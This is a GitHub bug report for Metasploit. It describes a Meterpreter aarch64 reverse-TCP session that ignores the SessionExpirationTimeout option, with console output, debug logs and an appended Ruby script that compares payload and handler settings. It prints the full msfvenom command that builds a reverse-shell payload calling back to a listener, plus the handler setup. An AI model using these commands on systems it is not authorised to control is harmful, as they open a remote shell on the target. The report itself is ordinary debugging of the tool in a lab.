metasploit-framework

SessionExpirationTimeout option not working in payload/linux/aarch64/meterpreter_reverse_tcp

Open xyzzklk opened this issue 1 year ago • 4 comments

Steps to reproduce

How'd you do it?

  1. I generated a payload using the command msfvenom -p linux/aarch64/meterpreter_reverse_tcp LHOST=192.168.1.165 LPORT=3000 -f elf --platform linux --arch aarch64 -o /home/xyzzklkuser/test SessionExpirationTimeout=30 SessionCommunicationTimeout=300 SessionRetryTotal=15 SessionRetryWait=1.
  2. I started an exploit/multi/handler on my Ubuntu PC, and set the same PAYLOAD, LHOST and LPORT.
  3. I ran the payload on an aarch64 Kali Linux device.
  4. A meterpreter session opened. Everything's fine until now.
===============

  Id  Name  Type                  Information            Connection
  --  ----  ----                  -----------            ----------
  27        meterpreter aarch64/  root @ localhost.loca  192.168.1.165:3000 ->
            linux                 ldomain                 192.168.1.198:52950
                                                         (192.168.1.198)

C&C: Ubuntu Desktop 23 x64 client: Kali Linux on aarch64

Were you following a specific guide/tutorial or reading documentation?

I'm not.

Expected behavior

Session should die after session has been established for 30s, since SessionExpirationTimeout is 30. It should be like this:

[*] 192.168.1.198 - Meterpreter Session 27 closed. Reason: Died

Current behavior

Nothing happened after a long time. Session is still active, and can be chosen to interact with.

msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                  Information            Connection
  --  ----  ----                  -----------            ----------
  27        meterpreter aarch64/  root @ localhost.loca  192.168.1.165:3000 ->
            linux                 ldomain                 192.168.1.198:52950
                                                         (192.168.1.198)

msf6 exploit(multi/handler) > sessions -i 27
[*] Starting interaction with 27...

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Debian  (Linux 5.10.101-android12-9-00001-gf4c0e37dbcde-ab8596533)
Architecture : aarch64
BuildTuple   : aarch64-linux-musl
Meterpreter  : aarch64/linux
meterpreter > 

Metasploit version

msf6 exploit(multi/handler) > version
Framework: 6.3.48-dev-
Console  : 6.3.48-dev-
msf6 exploit(multi/handler) > 

Additional Information

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=exploit/multi/handler

[multi/handler]
PAYLOAD=linux/x64/meterpreter_reverse_tcp
LHOST=192.168.1.165
LPORT=3000
ExitOnSession=false
WORKSPACE=
VERBOSE=false
WfsDelay=2
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ListenerTimeout=0

Database Configuration

The database contains the following information:

Session Type: Connected to msf. Connection type: postgresql.
ID           Hosts  Vulnerabilities  Notes  Services
1 (Current)  2      2                2      0
Total (1)    2      2                2      0

History

The following commands were ran during the session and before this issue occurred:

153    set loglevel 3
154    use exploit/multi/handler
155    set PAYLOAD linux/x64/meterpreter_reverse_tcp
156    set LHOST 192.168.1.165
157    set LPORT 3000
158    set ExitOnSession false
159    exploit -j
160    debug

Framework Errors

The following framework errors occurred before the issue occurred:

[01/13/2024 19:50:55] [e(0)] core: Errno::ENOENT No such file or directory - git
[01/13/2024 19:50:57] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[01/13/2024 19:50:57] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/13/2024 19:50:59] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[01/13/2024 19:51:01] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/13/2024 19:53:42] [e(0)] core: Errno::ENOENT No such file or directory - git
[01/13/2024 19:53:43] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[01/13/2024 19:53:43] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/13/2024 19:53:46] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[01/13/2024 19:53:47] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported

Web Service Errors

The following web service errors occurred before the issue occurred:

msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

[01/13/2024 19:27:32] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (15)
[01/13/2024 19:27:37] [d(0)] core: Session 15 failed to respond to an echo command
[01/13/2024 19:27:39] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (16)
[01/13/2024 19:27:44] [d(0)] core: Session 16 failed to respond to an echo command
[01/13/2024 19:27:45] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (17)
[01/13/2024 19:27:50] [d(0)] core: Session 17 failed to respond to an echo command
[01/13/2024 19:27:52] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (18)
[01/13/2024 19:27:57] [d(0)] core: Session 18 failed to respond to an echo command
[01/13/2024 19:27:59] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (19)
[01/13/2024 19:28:04] [d(0)] core: Session 19 failed to respond to an echo command
[01/13/2024 19:28:06] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (20)
[01/13/2024 19:28:11] [d(0)] core: Session 20 failed to respond to an echo command
[01/13/2024 19:28:13] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (21)
[01/13/2024 19:28:13] [w(0)] core: Exception in scheduler thread EOFError EOFError
[01/13/2024 19:28:22] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (22)
[01/13/2024 19:28:27] [d(0)] core: Session 22 failed to respond to an echo command
[01/13/2024 19:28:29] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (23)
[01/13/2024 19:28:34] [d(0)] core: Session 23 failed to respond to an echo command
[01/13/2024 19:28:36] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (24)
[01/13/2024 19:28:41] [d(0)] core: Session 24 failed to respond to an echo command
[01/13/2024 19:28:43] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (25)
[01/13/2024 19:28:48] [d(0)] core: Session 25 failed to respond to an echo command
[01/13/2024 19:28:52] [w(0)] core: Exception in scheduler thread EOFError EOFError
[01/13/2024 19:29:23] [e(0)] core: Exploit failed (multi/handler): Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:3000). - Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:3000).
[01/13/2024 19:50:55] [e(0)] core: Errno::ENOENT No such file or directory - git
[01/13/2024 19:50:57] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[01/13/2024 19:50:57] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/13/2024 19:50:59] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[01/13/2024 19:51:01] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/13/2024 19:52:09] [i(2)] core: Reloading exploit module multi/handler. Ambiguous module warnings are safe to ignore
[01/13/2024 19:52:23] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: reverse to reverse
[01/13/2024 19:52:23] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: bind to reverse
[01/13/2024 19:52:23] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: noconn to reverse
[01/13/2024 19:52:23] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: none to reverse
[01/13/2024 19:52:23] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: tunnel to reverse
[01/13/2024 19:52:23] [d(1)] core: Module linux/x64/meterpreter_reverse_tcp is compatible with multi/handler
[01/13/2024 19:53:07] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (1)
[01/13/2024 19:53:42] [e(0)] core: Errno::ENOENT No such file or directory - git
[01/13/2024 19:53:43] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[01/13/2024 19:53:43] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[01/13/2024 19:53:46] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[01/13/2024 19:53:47] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[01/13/2024 19:54:41] [i(2)] core: Reloading exploit module multi/handler. Ambiguous module warnings are safe to ignore
[01/13/2024 19:54:57] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: reverse to reverse
[01/13/2024 19:54:57] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: bind to reverse
[01/13/2024 19:54:57] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: noconn to reverse
[01/13/2024 19:54:57] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: none to reverse
[01/13/2024 19:54:57] [d(3)] core: Checking compat [linux/x64/meterpreter_reverse_tcp with multi/handler]: tunnel to reverse
[01/13/2024 19:54:57] [d(1)] core: Module linux/x64/meterpreter_reverse_tcp is compatible with multi/handler
[01/13/2024 19:55:44] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (1)

Web Service Logs

The following web service logs were recorded before the issue occurred:

msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Framework: 6.3.48-dev-
Ruby: ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux]
OpenSSL: OpenSSL 1.1.1m  14 Dec 2021
Install Root: /snap/metasploit-framework/1160/opt/metasploit-framework/embedded/framework
Session Type: Connected to msf. Connection type: postgresql.
Install Method: Omnibus Installer

xyzzklk, Jan 13 '24 09:01
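
A triage check for reports like this one, as an added example that is not part of the original issue or of Metasploit's code: it compares the options on the reported msfvenom command with the [multi/handler] section of the debug dump and lists every option whose handler value differs or is not set. The helper names are hypothetical; the command and the (abridged) datastore text are copied from the report above.

```ruby
# Added triage example; helper names are hypothetical, not Metasploit APIs.
# Inputs are copied (datastore abridged) from the report above.

MSFVENOM_CMD = 'msfvenom -p linux/aarch64/meterpreter_reverse_tcp ' \
  'LHOST=192.168.1.165 LPORT=3000 -f elf --platform linux --arch aarch64 ' \
  '-o /home/xyzzklkuser/test SessionExpirationTimeout=30 ' \
  'SessionCommunicationTimeout=300 SessionRetryTotal=15 SessionRetryWait=1'

DEBUG_DUMP = <<~DUMP
  [framework/ui/console]
  ActiveModule=exploit/multi/handler

  [multi/handler]
  PAYLOAD=linux/x64/meterpreter_reverse_tcp
  LHOST=192.168.1.165
  LPORT=3000
  ExitOnSession=false
DUMP

# Options given to msfvenom: the -p argument plus every KEY=VALUE token.
def generator_options(cmd)
  tokens = cmd.split
  pairs = tokens.grep(/\A\w+=/).map { |t| t.split('=', 2) }
  { 'PAYLOAD' => tokens[tokens.index('-p') + 1] }.merge(pairs.to_h)
end

# One section of the INI-style datastore dump, returned as a Hash.
def datastore_section(dump, name)
  section = nil
  dump.each_line(chomp: true).each_with_object({}) do |line, out|
    if (m = line.match(/\A\[(.+)\]\z/))
      section = m[1]
    elsif section == name && line.include?('=')
      out.store(*line.split('=', 2))
    end
  end
end

# Generator options whose handler value differs (nil = not set on the handler).
def mismatches(gen, handler)
  gen.reject { |key, value| handler[key] == value }
     .to_h { |key, value| [key, [value, handler[key]]] }
end

REPORT = mismatches(generator_options(MSFVENOM_CMD),
                    datastore_section(DEBUG_DUMP, 'multi/handler'))
REPORT.each { |k, (g, h)| puts "#{k}: msfvenom=#{g} handler=#{h.inspect}" }
```

A listed difference is a lead for whoever triages the report, not a diagnosis of why the timeout did not fire.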